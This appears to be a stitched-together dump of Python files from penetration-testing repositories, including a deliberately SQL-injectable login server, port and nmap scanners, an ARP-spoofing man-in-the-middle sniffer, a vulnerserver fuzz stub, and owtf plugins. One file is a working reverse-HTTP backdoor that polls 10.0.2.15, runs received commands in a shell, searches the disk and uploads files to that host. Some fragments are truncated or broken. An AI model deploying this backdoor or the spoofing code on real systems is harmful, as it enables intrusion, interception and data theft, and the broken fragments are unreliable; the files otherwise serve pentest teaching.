print("Thats strange !! -> %s"%bit_wise_or)
left_shift= a << b
if left_shift:
print("Remember Left shift has multiplication impact. -> %s"%left_shift)
else:
print("Thats strange !! -> %s"%left_shift)
right_shift= a >> b
if right_shift:
print("Thats strange !! -> %s"%right_shift)
else:
print("Remember Right shift has division impact. -> %s"%right_shift)
neg_minus_1= ~ a
if neg_minus_1 :
print("~ operator has (-n-1) impact - (-n-1) for %s -> %s "%(a,neg_minus_1))
else:
print("~ operator has (-n-1) impact - Produced 0 -> %s"%neg_minus_1)
| 25 | 77 | 0.65127 |
Ethical-Hacking-Scripts | import sqlite3, socket, threading, sys
class WebServer:
def __init__(self):
self.logo()
self.valid = False
self.name_list = ["admin adminpassword123456", "bobby cheeseburger69", "david 19216801", "mine craft", "jerry password", "tom jerry"]
self.names = ["admin","bobby","david","mine","jerry","tom"]
self.passwords = ["adminpassword123456", "cheeseburger69", "19216801", "craft", "password", "jerry"]
try:
self.ip = sys.argv[1]
self.port = int(sys.argv[2])
self.dbfile = "users.db"
try:
file = open(self.dbfile,"r")
except:
file = open(self.dbfile,"w")
db = sqlite3.connect(self.dbfile)
cursor = db.cursor()
try:
cursor.execute("select * from users")
except:
cursor.execute("create table users(name, password, logins)")
try:
for i in self.name_list:
cursor.execute(f"delete from users where name = '{i.split()[0]}'")
except:
pass
for i in self.name_list:
cursor.execute(f"insert into users values('{i.split()[0]}', '{i.split()[1]}', '0')")
print(f"\n[+] Try to break into these accounts via SQL Injection: {self.names}")
print(f"[+] In case you give up, here are the passwords to the accounts: {self.passwords}\n")
try:
self.externalip = sys.argv[3]
except Exception as e:
self.externalip = self.ip
self.valid = True
db.commit()
cursor.close()
db.close()
except Exception as e:
print("[+] Invalid Arguments!\n[+] Usage: python3 VulnerableServer.py <ip> <port> <externalip>\n[+] Note: The External IP argument is optional.")
if self.valid:
try:
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((self.ip, self.port))
self.msgs = []
self.packet = self.gen_packet()
print(f"[+] Vulnerable SQL Web Server Started on: {self.ip}:{self.port}")
except Exception as e:
print(f"[+] Server Cannot be started due to Error: {e}")
self.valid = False
def logo(self):
print("""
__ __ _ _ _ _____ ____ _ _____ __ ___
\ \ / / | | | | | | / ____|/ __ \| | / ____| /_ | / _ \
\ \ / / _| |_ __ ___ _ __ __ _| |__ | | ___| (___ | | | | | | (___ ___ _ ____ _____ _ __ __ _| || | | |
\ \/ / | | | | '_ \ / _ \ '__/ _` | '_ \| |/ _ \ ___ \| | | | | \___ \ / _ \ '__\ \ / / _ \ '__| \ \ / / || | | |
\ /| |_| | | | | | __/ | | (_| | |_) | | __/____) | |__| | |____ ____) | __/ | \ V / __/ | \ V /| || |_| |
\/ \__,_|_|_| |_|\___|_| \__,_|_.__/|_|\___|_____/ \___\_\______| |_____/ \___|_| \_/ \___|_| \_/ |_(_)___/
Vulnerable Web Server made for Testing SQL Injections by DrSquid""")
def gen_packet(self, sqlquery="", script=""):
packet = f"""
<title>Vulnerable SQL Web Server</title>
<h1>Horrific Looking Login Page</h1>
This is a horrible looking login page. It is meant to be vulnerable to SQL Injections.
<form action="http://{self.externalip}:{self.port}">
<input type="text" placeholder="Username" name="name">
<h1></h1>
<input type="password" placeholder="Password" name="password">
<input type="submit" value="Log in">
<h4>Sql Query: {sqlquery}</h4>
</form>
{script}
"""
return packet
def listen(self):
if self.valid:
try:
print("[+] Server is listening For Connections.....")
if self.externalip != self.ip:
print(f"[+] Also listening on(for external connections): {self.externalip}:{self.port}")
print("")
while True:
ipaddr = ""
self.server.listen()
conn, ip = self.server.accept()
self.packet = self.gen_packet()
msg = conn.recv(1024).decode()
item = 0
msg_split = msg.split()
for i in msg_split:
if 'x-forwarded-for' in i.lower():
ipaddr = msg_split[item + 1]
break
item += 1
if ipaddr == "":
ipaddr = ip[0]
print(f"[+] {ipaddr} has connected.")
handler = threading.Thread(target=self.handler, args=(conn, msg, ipaddr))
handler.start()
except:
pass
def simplify_str(self, item):
return item.replace("+", " ").replace("%3C", "<").replace("%3E", ">").replace(
"%2F", "/").replace("%22", '"').replace("%27", "'").replace("%3D", "=").replace("%2B",
"+").replace("%3A", ":").replace("%28", "(").replace("%29", ")").replace("%2C", ","
).replace("%3B", ";").replace("%20", " ").replace("%3F", "?").replace("%5C", "\\"
).replace("%7B", "{").replace("%7D", "}").replace("%24", "$").replace("%0D", "\n"
).replace("%0A", " ").replace("%40","@").replace("%25", "%")
def authenticate(self, query):
db = sqlite3.connect(self.dbfile)
cursor = db.cursor()
cursor.execute(query)
item = cursor.fetchall()
if len(item) >= 1:
return True
else:
return False
def handler(self, conn, msg, ip):
try:
conn.send('HTTP/1.0 200 OK\n'.encode())
conn.send('Content-Type: text/html\n'.encode())
if "/?name=" in msg.split()[1] and "password" in msg.split()[1]:
try:
username = self.simplify_str(str(msg).split()[1].split("=")[1].replace("&password","")).lower()
password = self.simplify_str(str(msg).split()[1].split("=")[2]).lower()
script = ""
if username.strip() == "" or password.strip() == "":
conn.send(self.packet.encode())
else:
query = f"select * from users where name = '{username}' and password = '{password}'"
if self.authenticate(query):
script = "<script>alert('Logged in!')</script>"
print(f"[+] {ip} has logged into '{username}' with '{password}'.")
else:
script = "<script>alert('Invalid Name or Password.')</script>"
print(f"[+] {ip} had attempted to login to '{username}' with '{password}' but failed.")
packet = self.gen_packet(sqlquery=query, script=script)
conn.send(packet.encode())
except Exception as e:
print(f"[+] Error: {e}")
packet = self.gen_packet(sqlquery=query, script=script)
conn.send(packet.encode())
else:
conn.send(self.packet.encode())
conn.close()
except:
pass
e = WebServer()
e.listen()
| 48.302632 | 157 | 0.438943 |
cybersecurity-penetration-testing | import csv
import os
import logging
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
def csvWriter(output_data, headers, output_dir, output_name):
"""
The csvWriter function uses the csv.DictWriter module to write the list of dictionaries. The
DictWriter can take a fieldnames argument, as a list, which represents the desired order of columns.
:param output_data: The list of dictionaries containing embedded metadata.
:param headers: A list of keys in the dictionary that represent the desired order of columns in the output.
:param output_dir: The folder to write the output CSV to.
:param output_name: The name of the output CSV.
:return:
"""
msg = 'Writing ' + output_name + ' CSV output.'
print '[+]', msg
logging.info(msg)
with open(os.path.join(output_dir, output_name), 'wb') as outfile:
# We use DictWriter instead of Writer to write dictionaries to CSV.
writer = csv.DictWriter(outfile, fieldnames=headers)
# Writerheader writes the header based on the supplied headers object
writer.writeheader()
for dictionary in output_data:
if dictionary:
writer.writerow(dictionary)
| 37.90625 | 111 | 0.687299 |
Mastering-Machine-Learning-for-Penetration-Testing | import socket, struct, sys
import numpy as np
import pickle
def loaddata(fileName):
file = open(fileName, 'r')
xdata = []
ydata = []
xdataT = []
ydataT = []
flag=0
count1=0
count2=0
count3=0
count4=0
#dicts to convert protocols and state to integers
protoDict = {'arp': 5, 'unas': 13, 'udp': 1, 'rtcp': 7, 'pim': 3, 'udt': 11, 'esp': 12, 'tcp' : 0, 'rarp': 14, 'ipv6-icmp': 9, 'rtp': 2, 'ipv6': 10, 'ipx/spx': 6, 'icmp': 4, 'igmp' : 8}
stateDict = {'': 1, 'FSR_SA': 30, '_FSA': 296, 'FSRPA_FSA': 77, 'SPA_SA': 31, 'FSA_SRA': 1181, 'FPA_R': 46, 'SPAC_SPA': 37, 'FPAC_FPA': 2, '_R': 1, 'FPA_FPA': 784, 'FPA_FA': 66, '_FSRPA': 1, 'URFIL': 431, 'FRPA_PA': 5, '_RA': 2, 'SA_A': 2, 'SA_RA': 125, 'FA_FPA': 17, 'FA_RA': 14, 'PA_FPA': 48, 'URHPRO': 380, 'FSRPA_SRA': 8, 'R_':541, 'DCE': 5, 'SA_R': 1674, 'SA_': 4295, 'RPA_FSPA': 4, 'FA_A': 17, 'FSPA_FSPAC': 7, 'RA_': 2230, 'FSRPA_SA': 255, 'NNS': 47, 'SRPA_FSPAC': 1, 'RPA_FPA': 42, 'FRA_R': 10, 'FSPAC_FSPA': 86, 'RPA_R': 3, '_FPA': 5, 'SREC_SA': 1, 'URN': 339, 'URO': 6, 'URH': 3593, 'MRQ': 4, 'SR_FSA': 1, 'SPA_SRPAC': 1, 'URP': 23598, 'RPA_A': 1, 'FRA_': 351, 'FSPA_SRA': 91, 'FSA_FSA': 26138, 'PA_': 149, 'FSRA_FSPA': 798, 'FSPAC_FSA': 11, 'SRPA_SRPA': 176, 'SA_SA': 33, 'FSPAC_SPA': 1, 'SRA_RA': 78, 'RPAC_PA': 1, 'FRPA_R': 1, 'SPA_SPA': 2989, 'PA_RA': 3, 'SPA_SRPA': 4185, 'RA_FA': 8, 'FSPAC_SRPA': 1, 'SPA_FSA': 1, 'FPA_FSRPA': 3, 'SRPA_FSA': 379, 'FPA_FRA': 7, 'S_SRA': 81, 'FSA_SA': 6, 'State': 1, 'SRA_SRA': 38, 'S_FA': 2, 'FSRPAC_SPA': 7, 'SRPA_FSPA': 35460, 'FPA_A': 1, 'FSA_FPA': 3, 'FRPA_RA': 1, 'FSAU_SA': 1, 'FSPA_FSRPA': 10560, 'SA_FSA': 358, 'FA_FRA': 8, 'FSRPA_SPA': 2807, 'FSRPA_FSRA': 32, 'FRA_FPA': 6, 'FSRA_FSRA': 3, 'SPAC_FSRPA': 1, 'FS_': 40, 'FSPA_FSRA': 798, 'FSAU_FSA': 13, 'A_R': 36, 'FSRPAE_FSPA': 1, 'SA_FSRA': 4, 'PA_PAC': 3, 'FSA_FSRA': 279, 'A_A': 68, 'REQ': 892, 'FA_R': 124, 'FSRPA_SRPA': 97, 'FSPAC_FSRA':20, 'FRPA_RPA': 7, 'FSRA_SPA': 8, 'INT': 85813, 'FRPA_FRPA': 6, 'SRPAC_FSPA': 4, 'SPA_SRA': 808, 'SA_SRPA': 1, 'SPA_FSPA': 2118, 'FSRAU_FSA': 2, 'RPA_PA': 171,'_SPA': 268, 'A_PA': 47, 'SPA_FSRA': 416, 'FSPA_FSRPAC': 2, 'PAC_PA': 5, 'SRPA_SPA': 9646, 'SRPA_FSRA': 13, 'FPA_FRPA': 49, 'SRA_SPA': 10, 'SA_SRA': 838, 'PA_PA': 5979, 'FPA_RPA': 27, 'SR_RA': 10, 'RED': 4579, 'CON': 2190507, 'FSRPA_FSPA':13547, 'FSPA_FPA': 4, 'FAU_R': 2, 'ECO': 2877, 'FRPA_FPA': 72, 'FSAU_SRA': 1, 'FRA_FA': 8, 'FSPA_FSPA': 216341, 'SEC_RA': 19, 'ECR': 3316, 'SPAC_FSPA': 12, 'SR_A': 34, 'SEC_': 5, 'FSAU_FSRA': 3, 'FSRA_FSRPA': 11, 'SRC': 13, 'A_RPA': 1, 'FRA_PA': 3, 'A_RPE': 1, 'RPA_FRPA': 20, '_SRA': 74, 'SRA_FSPA': 293, 'FPA_': 118, 'FSRPAC_FSRPA': 2, '_FA': 1, 'DNP': 1, 'FSRPA_FSRPA': 379, 'FSRA_SRA': 14, '_FRPA': 1, 'SR_': 59, 'FSPA_SPA': 517, 'FRPA_FSPA': 1, 'PA_A': 159, 'PA_SRA': 1, 'FPA_RA': 5, 'S_': 68710, 'SA_FSRPA': 4, 'FSA_FSRPA': 1, 'SA_SPA': 4, 'RA_A': 5, '_SRPA': 9, 'S_FRA': 156, 'FA_FRPA': 1, 'PA_R': 72, 'FSRPAEC_FSPA': 1, '_PA': 7, 'RA_S': 1, 'SA_FR': 2, 'RA_FPA': 6, 'RPA_': 5, '_FSPA': 2395, 'FSA_FSPA': 230, 'UNK': 2, 'A_RA': 9, 'FRPA_': 6, 'URF': 10, 'FS_SA': 97, 'SPAC_SRPA': 8, 'S_RPA': 32, 'SRPA_SRA': 69, 'SA_RPA': 30, 'PA_FRA': 4, 'FSRA_SA': 49, 'FSRA_FSA': 206, 'PAC_RPA': 1, 'SRA_': 18, 'FA_': 451, 'S_SA': 6917, 'FSPA_SRPA': 427, 'TXD': 542,'SRA_SA': 1514, 'FSPA_FA': 1, 'FPA_FSPA': 10, 'RA_PA': 3, 'SRA_FSA': 709, 'SRPA_SPAC': 3, 'FSPAC_FSRPA': 10, 'A_': 191, 'URNPRO': 2, 'PA_RPA': 81, 'FSPAC_SRA':1, 'SRPA_FSRPA': 3054, 'SPA_': 1, 'FA_FA': 259, 'FSPA_SA': 75, 'SR_SRA': 1, 'FSA_': 2, 'SRPA_SA': 406, 'SR_SA': 3119, 'FRPA_FA': 1, 'PA_FRPA': 13, 'S_R': 34, 'FSPAEC_FSPAE': 3, 'S_RA': 61105, 'FSPA_FSA': 5326, '_SA': 20, 'SA_FSPA': 15, 'SRPAC_SPA': 8, 'FPA_PA': 19, 'FSRPAE_FSA': 1, 'S_A': 1, 'RPA_RPA': 3, 'NRS': 6, 'RSP': 115, 'SPA_FSRPA': 1144, 'FSRPAC_FSPA': 139}
file.readline()
for line in file:
sd = line[:-1].split(',')
dur, proto, Sport, Dport, Sip, Dip, totP, totB, label, state = sd[1], sd[2], sd[4], sd[7], sd[3], sd[6], sd[-4], sd[-3], sd[-1], sd[8]
try:
Sip = socket.inet_aton(Sip)
Sip = struct.unpack("!L", Sip)[0]
except:
continue
try:
Dip = socket.inet_aton(Dip)
Dip = struct.unpack("!L", Dip)[0]
except:
continue
if Sport=='': continue
if Dport=='': continue
#back, nor, bot
try:
if "Background" in label:
label=0
elif "Normal" in label:
label = 0
elif "Botnet" in label:
label = 1
if flag==0:
#Training Dataset
if label==0 and count1<20001:
xdata.append([float(dur), protoDict[proto], int(Sport), int(Dport), Sip, Dip, int(totP), int(totB), stateDict[state]])
ydata.append(label)
count1+=1
elif label==1 and count2<20001:
xdata.append([float(dur), protoDict[proto], int(Sport), int(Dport), Sip, Dip, int(totP), int(totB), stateDict[state]])
ydata.append(label)
count2+=1
elif count1>19999 and count2>19999:
#print("HI")
flag=1
else:
#Test dataset
if label==0 and count3<5001:
#print("H")
xdataT.append([float(dur), protoDict[proto], int(Sport), int(Dport), Sip, Dip, int(totP), int(totB), stateDict[state]])
ydataT.append(label)
count3+=1
elif label==1 and count4<5001:
xdataT.append([float(dur), protoDict[proto], int(Sport), int(Dport), Sip, Dip, int(totP), int(totB), stateDict[state]])
ydataT.append(label)
count4 += 1
elif count3>4999 and count4>4999:
break
except:
continue
#pickle the dataset for fast loading
file = open('flowdata.pickle', 'wb')
pickle.dump([np.array(xdata), np.array(ydata), np.array(xdataT), np.array(ydataT)], file)
#return the training and the test dataset
return np.array(xdata), np.array(ydata), np.array(xdataT), np.array(ydataT)
if __name__ == "__main__":
loaddata('flowdata.binetflow')
| 65.427083 | 3,337 | 0.507058 |
Effective-Python-Penetration-Testing | import nmap # import nmap.py module
nmap = nmap.PortScanner()
host = '127.0.0.1'
nmap.scan(host, '1-1024')
print nmap.command_line()
print nmap.scaninfo()
for host in nmap.all_hosts():
print('Host : %s (%s)' % (host, nmap[host].hostname()))
print('State : %s' % nmap[host].state())
for proto in nmap[host].all_protocols():
print('Protocol : %s' % proto)
listport = nmap[host]['tcp'].keys()
listport.sort()
for port in listport:
print('port : %s\tstate : %s' % (port, nmap[host][proto][port]['state']))
| 26.35 | 77 | 0.606227 |
cybersecurity-penetration-testing | import sys
import os
import nmap
with open("./nmap_output.xml", "r") as fd:
content = fd.read()
nm.analyse_nmap_xml_scan(content)
print(nm.csv()) | 19.375 | 42 | 0.635802 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Searching for Content
import requests
import subprocess
import os
import time
while True:
req = requests.get('http://10.0.2.15')
command = req.text
if 'terminate' in command:
break
elif 'grab' in command:
grab,path=command.split('*')
if os.path.exists(path):
url = 'http://10.0.2.15/store'
files = {'file': open(path, 'rb')}
r = requests.post(url, files=files)
else:
post_response = requests.post(url='http://10.0.2.15', data='[-] Not able to find the file !' )
elif 'search' in command: # The Formula is search <path>*.<file extension> , for example let's say that we got search C:\\*.pdf
# if we remove the first 7 character the output would C:\\*.pdf which is basically what we need
command = command[7:] # cut off the the first 7 character ,, output would be C:\\*.pdf
path,ext=command.split('*') # split C:\\*.pdf into two sections, the first section (C:\\) will be stored in path variable and
# the second variable (.pdf) will be stored in ext variable
list = '' # here we define a string where we will append our result on it
'''
os.walk is a function that will naviagate ALL the directoies specified in the provided path and returns three values:-
dirpath is a string contains the path to the directory
dirnames is a list of the names of the subdirectories in dirpath
files is a list of the files name in dirpath
Once we got the files list, we check each file (using for loop), if the file extension was matching what we are looking for, then
we add the directory path into list string. the os.path.join represents a path relative for our file to
the current directory and in our example it's the C:\\ directory
'''
for dirpath, dirname, files in os.walk(path):
for file in files:
if file.endswith(ext):
list = list + '\n' + os.path.join(dirpath, file)
requests.post(url='http://10.0.2.15', data= list ) # Send the search result
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
post_response = requests.post(url='http://10.0.2.15', data=CMD.stdout.read() )
post_response = requests.post(url='http://10.0.2.15', data=CMD.stderr.read() )
time.sleep(3)
| 33.868421 | 141 | 0.596074 |
owtf | """
GREP Plugin for Logout and Browse cache management
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for Cache snooping protections"
def run(PluginInfo):
title = "This plugin looks for server-side protection headers and tags against cache snooping<br />"
Content = plugin_helper.HtmlString(title)
Content += plugin_helper.FindResponseHeaderMatchesForRegexpName(
"HEADERS_FOR_CACHE_PROTECTION"
)
Content += plugin_helper.FindResponseBodyMatchesForRegexpName(
"RESPONSE_REGEXP_FOR_CACHE_PROTECTION"
)
return Content
| 33.8 | 104 | 0.755396 |
cybersecurity-penetration-testing | __author__ = 'Preston Miller & Chapin Bryce'
import wal_crawler
import setupapi
import userassist
import exif
import id3
import office
import pst_indexer
| 14.6 | 44 | 0.793548 |
owtf | """
owtf.api.handlers.report
~~~~~~~~~~~~~~~~~~~~~~~~
"""
import collections
from collections import defaultdict
from time import gmtime, strftime
from owtf.api.handlers.base import APIRequestHandler
from owtf.constants import RANKS, MAPPINGS, SUPPORTED_MAPPINGS
from owtf.lib import exceptions
from owtf.lib.exceptions import APIError
from owtf.managers.poutput import get_all_poutputs
from owtf.managers.target import get_target_config_by_id
from owtf.models.test_group import TestGroup
from owtf.utils.pycompat import iteritems
from owtf.api.handlers.jwtauth import jwtauth
__all__ = ["ReportExportHandler"]
@jwtauth
class ReportExportHandler(APIRequestHandler):
"""Class handling API methods related to export report funtionality.
This API returns all information about a target scan present in OWTF.
:raise InvalidTargetReference: If target doesn't exists.
:raise InvalidParameterType: If some unknown parameter in `filter_data`.
"""
SUPPORTED_METHODS = ["GET"]
def get(self, target_id=None):
"""Returns JSON(data) for the template.
**Example request**:
.. sourcecode:: http
GET /api/v1/targets/2/export HTTP/1.1
Accept: application/json
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"data": {
"top_url": "https://google.com:443",
"top_domain": "com",
"target_url": "https://google.com",
"time": "2018-04-03 09:21:27",
"max_user_rank": -1,
"url_scheme": "https",
"host_path": "google.com",
"ip_url": "https://104.28.0.9",
"host_ip": "104.28.0.9",
"vulnerabilities": [],
"max_owtf_rank": -1,
"port_number": "443",
"host_name": "google.com",
"alternative_ips": "['104.28.1.9']",
"scope": true,
"id": 2
}
}
"""
if not target_id:
raise APIError(400, "Missing target id")
try:
filter_data = dict(self.request.arguments)
plugin_outputs = get_all_poutputs(filter_data, target_id=target_id, inc_output=True)
except exceptions.InvalidTargetReference:
raise APIError(400, "Invalid target reference provided")
except exceptions.InvalidParameterType:
raise APIError(400, "Invalid parameter type provided")
# Group the plugin outputs to make it easier in template
grouped_plugin_outputs = defaultdict(list)
for output in plugin_outputs:
output["rank"] = RANKS.get(max(output["user_rank"], output["owtf_rank"]))
grouped_plugin_outputs[output["plugin_code"]].append(output)
# Needed ordered list for ease in templates
grouped_plugin_outputs = collections.OrderedDict(sorted(grouped_plugin_outputs.items()))
# Get mappings
mapping_type = self.get_argument("mapping", None)
mappings = {}
if mapping_type and mapping_type in SUPPORTED_MAPPINGS:
for k, v in iteritems(MAPPINGS):
if v.get(mapping_type, None) is not None:
mappings[k] = v[mapping_type]
# Get test groups as well, for names and info links
test_groups = {}
for test_group in TestGroup.get_all(self.session):
test_group["mapped_code"] = test_group["code"]
test_group["mapped_descrip"] = test_group["descrip"]
if mappings and test_group["code"] in mappings:
code, description = mappings[test_group["code"]]
test_group["mapped_code"] = code
test_group["mapped_descrip"] = description
test_groups[test_group["code"]] = test_group
vulnerabilities = []
for key, value in list(grouped_plugin_outputs.items()):
test_groups[key]["data"] = value
vulnerabilities.append(test_groups[key])
result = get_target_config_by_id(target_id)
result["vulnerabilities"] = vulnerabilities
result["time"] = strftime("%Y-%m-%d %H:%M:%S", gmtime())
if result:
self.success(result)
else:
raise APIError(500, "No config object exists for the given target")
| 35.637097 | 96 | 0.57904 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalSessionManagement")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 28.090909 | 75 | 0.783699 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
server = '192.168.214.5'
sport = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
s.send(('TRUN .' + 'A'*50 + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close() | 22.666667 | 53 | 0.667845 |
Ethical-Hacking-Scripts | import socket, threading, sys, ipaddress, time, os
from optparse import OptionParser
from scapy.all import *
class Port_Scanner:
def __init__(self, ip, ports):
self.ip = str(ip)
self.logfile = "squidmap.txt"
file = open(self.logfile,"w")
file.close()
self.isnetwork = False
self.isonehost = True
if "/24" in self.ip:
self.hosts = []
self.uphosts = []
self.isnetwork = True
self.isonehost = False
print(self.logo())
self.log_output(self.logo())
print(f"[+] Output will be saved in file: {os.path.join(os.getcwd(),self.logfile)}")
self.max_port = ports
self.ports = range(ports)
self.ports_scanned = 0
self.open_ports = []
self.checked_hosts = 0
self.banners = []
if self.isnetwork:
print("[+] Sending ICMP Packets to Network to check for online IP's.\n[+] Please wait.....\n")
self.networkscan()
if self.isonehost:
self.port_scan(self.ip)
def ping_host(self, host):
if sys.platform == "win32":
result = os.popen(f"ping {host} -n 1")
result2 = result.read()
else:
try:
result = os.popen(f"ping {host} -c 1")
result2 = result.read()
except:
result2 = ""
if "unreachable" in result2 or "100% loss" in result2 or "100.0% packet loss" in result2:
pass
else:
print(f"[+] {host} is up!")
self.uphosts.append(str(host))
self.checked_hosts += 1
def networkscan(self):
self.ip = str(self.ip)
self.split_ip = self.ip.split(".")
if not self.split_ip[len(self.split_ip)-1].startswith("0"):
self.split_ip.remove(self.split_ip[len(self.split_ip)-1])
self.split_ip.append("0/24")
self.result = ""
item = 0
for i in self.split_ip:
if item != len(self.split_ip)-1:
self.result = self.result + i + "."
else:
self.result = self.result + i
item += 1
self.ip = self.result
self.network = ipaddress.IPv4Network(self.ip)
for host in self.network.hosts():
self.hosts.append(str(host))
for host in self.hosts:
check_host = threading.Thread(target=self.ping_host, args=(host,))
check_host.start()
while True:
if self.checked_hosts >= len(self.hosts):
print(f"[+] Hosts Scan done.\n[+] Online Hosts: {self.uphosts}")
break
for host in self.uphosts:
portscan = threading.Thread(target=self.port_scan, args=(host,))
portscan.start()
def get_mac(self, ip):
arp = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=ip)
recv = srp(arp, timeout=2, verbose=False)
return recv[0][0][1].hwsrc
def log_output(self,msg):
time.sleep(1)
file = open(self.logfile,"r")
content = file.read()
file.close()
file = open(self.logfile,"w")
file.write(content+"\n")
file.write(msg)
file.close()
def logo(self):
return """
_________ .__ .___ _____ _____ _______
/ _____/ ________ __|__| __| _// \ _____ ______ ___ __/ | | \ _ \
\_____ \ / ____/ | \ |/ __ |/ \ / \\\__ \ \____ \ \ \/ / | |_ / /_\ \
/ < <_| | | / / /_/ / Y \/ __ \| |_> > \ / ^ / \ \_/ \\
/_______ /\__ |____/|__\____ \____|__ (____ / __/ \_/\____ | /\ \_____ /
\/ |__| \/ \/ \/|__| |__| \/ \/
Vulnerability-Scanner By DrSquid"""
def port_scan(self, ip):
print(f"[+] Beginning Port Scan On {ip}.")
mac = "Unknown"
reversedns = "Unknown"
try:
mac = self.get_mac(ip)
print(f"[+] {ip}'s MAC Address: {mac}")
except:
print(f"[+] Unable to obtain MAC Address from: {ip}")
try:
reversedns = socket.gethostbyaddr(ip)
print(f"[+] Reverse DNS of {ip}: {reversedns[0]}")
except:
print(f"[+] Unable to get Reverse DNS of {ip}.")
for port in self.ports:
scanning = threading.Thread(target=self.scan,args=(ip, port))
scanning.start()
while True:
if self.ports_scanned >= self.max_port:
open_ports = []
appendmsg = ""
msg=f"[+] Port Scan on {ip} Completed.\n[+] Obtained Banners For {ip}."
for port in self.open_ports:
if ip+" " in port:
port_split = port.split()
open_ports.append(port_split[1])
if len(open_ports) == 0:
appendmsg=f"\n[+] There are no Ports Open on {ip}."
else:
appendmsg=f"\n[+] Open Ports on {ip}: {open_ports}"
for port in open_ports:
for banner in self.banners:
split_banner = banner.split()
if ip in split_banner[0] and port in split_banner[1]:
result = ""
del split_banner[0]
del split_banner[0]
for item in split_banner:
result = result + " " + item
result = result.strip()
appendmsg += f"\n[+] {ip} Port {port} Banner: {result}"
msg += appendmsg
print(msg)
logmsg = "\n"+msg+f"\n[+] {ip}'s MAC Address: {mac}\n[+] Reverse DNS of {ip}: {reversedns[0]}"
self.log_output(logmsg)
break
def scan(self, ip, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((ip, port))
self.open_ports.append(f"{ip} {port}")
s.settimeout(10)
print(f"[!] Discovered Open Port on {ip}: {port}")
try:
banner = s.recv(65500).decode().strip("\n").strip("\r")
self.banners.append(f"{ip} {port} {banner}")
except Exception as e:
self.banners.append(f"{ip} {port} None")
s.close()
except Exception as e:
pass
self.ports_scanned += 1
class OptionParse:
def __init__(self):
if len(sys.argv) < 2:
self.usage()
else:
self.get_args()
def usage(self):
print(Port_Scanner.logo(None))
print("""
[+] Option-Parsing Help:
[+] --ip, --ipaddr - Specifies an IP Address to Scan(can be a network).
[+] --p, --ports - Specifies the amount of ports to Scan.
[+] Optional Arguements:
[+] --i, --info - Shows this message.
[+] Usage:""")
if sys.argv[0].endswith(".py"):
print("[+] python3 Squidmap.py --ip <ipaddr> --p <ports>")
print("[+] python3 Squidmap.py --i")
else:
print("[+] Squidmap --ip <ipaddr> --p <ports>")
print("[+] Squidmap --i")
def get_args(self):
self.opts = OptionParser()
self.opts.add_option("--ip","--ipaddr",dest="ip")
self.opts.add_option("--p","--port",dest="port")
self.opts.add_option("--i","--info",dest="info",action="store_true")
args, opt =self.opts.parse_args()
if args.info is not None:
self.usage()
sys.exit()
else:
pass
if args.ip is None:
self.usage()
else:
ip = args.ip
if args.port is None:
ports = 1024
else:
try:
ports = int(args.port)
except:
print("[+] Invalid Port!")
sys.exit()
SquidMap = Port_Scanner(ip, ports)
try:
from scapy.all import *
except:
Port_Scanner.logo(None)
print("[+] Scapy is required to run this script.\n[+] Run this command if you have python: pip install scapy")
sys.exit()
parser = OptionParse()
| 39.731132 | 115 | 0.446491 |
Python-Penetration-Testing-Cookbook | import sys
from scapy.all import *
interface = "en0"
source_ip = "192.168.1.1"
destination_ip = "192.168.1.35"
def getMAC(IP, interface):
answerd, unanswered = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 5, iface=interface, inter = 0.1)
for send,recieve in answerd:
return recieve.sprintf(r"%Ether.src%")
def setIPForwarding(set):
if set:
#for OSX
os.system('sysctl -w net.inet.ip.forwarding=1')
#for Linux
#os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
else:
#for OSX
os.system('sysctl -w net.inet.ip.forwarding=0')
#other
#os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
def resetARP(destination_ip, source_ip, interface):
destinationMAC = getMAC(destination_ip, interface)
sourceMAC = getMAC(source_ip, interface)
send(ARP(op=2, pdst=source_ip, psrc=destination_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=destinationMAC, retry=7))
send(ARP(op=2, pdst=destination_ip, psrc=source_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=sourceMAC, retry=7))
setIPForwarding(False)
def mitm(destination_ip, destinationMAC, source_ip, sourceMAC):
arp_dest_to_src = ARP(op=2, pdst=destination_ip, psrc=source_ip, hwdst=destinationMAC)
arp_src_to_dest = ARP(op=2, pdst=source_ip, psrc=destination_ip, hwdst=sourceMAC)
send(arp_dest_to_src)
send(arp_src_to_dest)
def callBackParser(packet):
if IP in packet:
source_ip = packet[IP].src
destination_ip = packet[IP].dst
print("From : " + str(source_ip) + " to -> " + str(destination_ip))
if TCP in packet:
try:
if packet[TCP].dport == 80 or packet[TCP].sport == 80:
print(packet[TCP].payload)
except:
pass
def main():
setIPForwarding(True)
try:
destinationMAC = getMAC(destination_ip, interface)
except Exception as e:
setIPForwarding(False)
print(e)
sys.exit(1)
try:
sourceMAC = getMAC(source_ip, interface)
except Exception as e:
setIPForwarding(False)
print(e)
sys.exit(1)
while True:
try:
mitm(destination_ip, destinationMAC, source_ip, sourceMAC)
sniff(iface=interface, prn=callBackParser,count=10)
except KeyboardInterrupt:
resetARP(destination_ip, source_ip, interface)
break
sys.exit(1)
main() | 29.7125 | 121 | 0.617264 |
cybersecurity-penetration-testing | import socket
host = "192.168.0.1"
port = 12346
